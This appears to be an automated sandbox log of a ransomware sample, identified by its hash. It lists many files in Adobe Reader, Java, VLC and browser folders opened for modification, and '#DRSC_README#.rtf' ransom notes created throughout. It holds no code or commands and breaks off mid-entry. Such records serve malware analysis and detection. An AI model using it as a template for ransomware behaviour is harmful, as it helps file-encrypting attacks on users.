710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\hu-hu\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.e4.rcp_1.3.100.v20141007-2033\epl-v10.html 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\lua\meta\reader\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\bin\jps.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Multimedia\MPP\Flash.mpp 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_comment_18.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\images\illustrations_retina.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\VisualElements\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-snaptracer_zh_CN.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\css\main-selector.css 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\en-gb\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.equinox.p2.rcp.feature_1.2.0.v20140523-0116\META-INF\ECLIPSE_.SF 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Mozilla Firefox\firefox.exe.sig 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\pl\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_filter-focus_32.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-modules-queries_ja.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\cgg\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\org-netbeans-modules-sendopts.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.rcp.intro.ja_5.5.0.165303.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\plugin.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\ru-ru\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Playstore\en_get.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\Font\PFM\zy______.pfm 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\nl-nl\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\db\lib\derbyLocale_zh_CN.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\lib\jfxswt.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_folder-focus_32.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\images\themes\dark\icons.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\images\themes\dark\core_icons_retina.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\fi-fi\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\cs-cz\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.apache.felix.gogo.runtime_0.10.0.v201209301036.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-sa_zh_CN.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\az\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\UIThemes\DarkTheme.acrotheme 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\pt-br\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\da-dk\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\sl-si\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.e4.core.commands.nl_zh_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.security_1.2.0.v20130424-1801.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-heapdump_ja.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\dialogs\equalizer_window.html 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\uz\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Annots.api 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\images\themes\dark\file_info.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.jarprocessor_1.0.300.v20131211-1531.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-charts_ja.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\he\LC_MESSAGES\vlc.mo 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\OutRestore.ps1 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.e4.ui.workbench.swt.nl_ja_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\bin\jp2launcher.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.8.0_66\jre\lib\images\cursors\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\eBook.api 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\fr-ma\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\he-il\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\viewer\nls\es-es\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\tr-tr\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\bin\jjs.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\it-it\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\com.jrockit.mc.feature.flightrecorder_5.5.0.165303\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\eu-es\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\de-de\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\1494870C-9912-C184-4CC9-B401-A53F4D8DE290.pdf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\zh-tw\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\images\example_icons.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\images\new_icons.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\hu-hu\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\ru-ru\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\sl_get.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\pages-app\images\themes\dark\rhp_world_icon_2x.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\fr-fr\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\nb-no\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_gridview_selected-hover.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\css\main.css 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\root\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\css\main.css 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-host-views_ja.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\RegisterNew.mpeg3 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\@1x\[email protected] 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\themes\dark\cstm_brand_preview.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Mozilla Firefox\uninstall\shortcuts_log.ini 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\LICENSE 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\nb-no\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\images\themes\dark\rhp_world_icon_hover_2x.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\.settings\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\ko-kr\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\pl-pl\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\en-gb\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\de-de\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\skins\fonts\FreeSansBold.ttf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\dialogs\batch_window.html 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.emf.common_2.10.1.v20140901-1043\META-INF\ECLIPSE_.SF 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\nl-nl\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\sv-se\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\org-netbeans-spi-quicksearch.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Multimedia\MPP\QuickTime.mpp 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\SearchEmail2x.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\nl-nl\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\hu-hu\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\generic-rhp-app\images\rhp_world_icon_2x.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\images\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\lt\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.browser.zh_CN_5.5.0.165303.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.flightrecorder.controlpanel.ui.zh_CN_5.5.0.165303.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\CollectSignatures.aapp 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\fi-fi\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\nl-nl\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\images\themes\dark\cstm_brand_preview.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\db\lib\derbyLocale_fr.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\css\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\modules\org-netbeans-modules-profiler-api.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\ug\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\selection-actions2x.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\pt-br\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\pages-app\js\nls\es-es\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\css\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.components.ui_5.5.0.165303.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\root\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\nl-nl\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\it-it\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\fr-ma\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\TrackedSend.aapp 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_rename_18.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\selection-actions.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\images\example_icons2x.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\nl-nl\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\fr-fr\AppStore_icon.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\dialogs\create_stream.html 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\org-netbeans-core-ui.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program 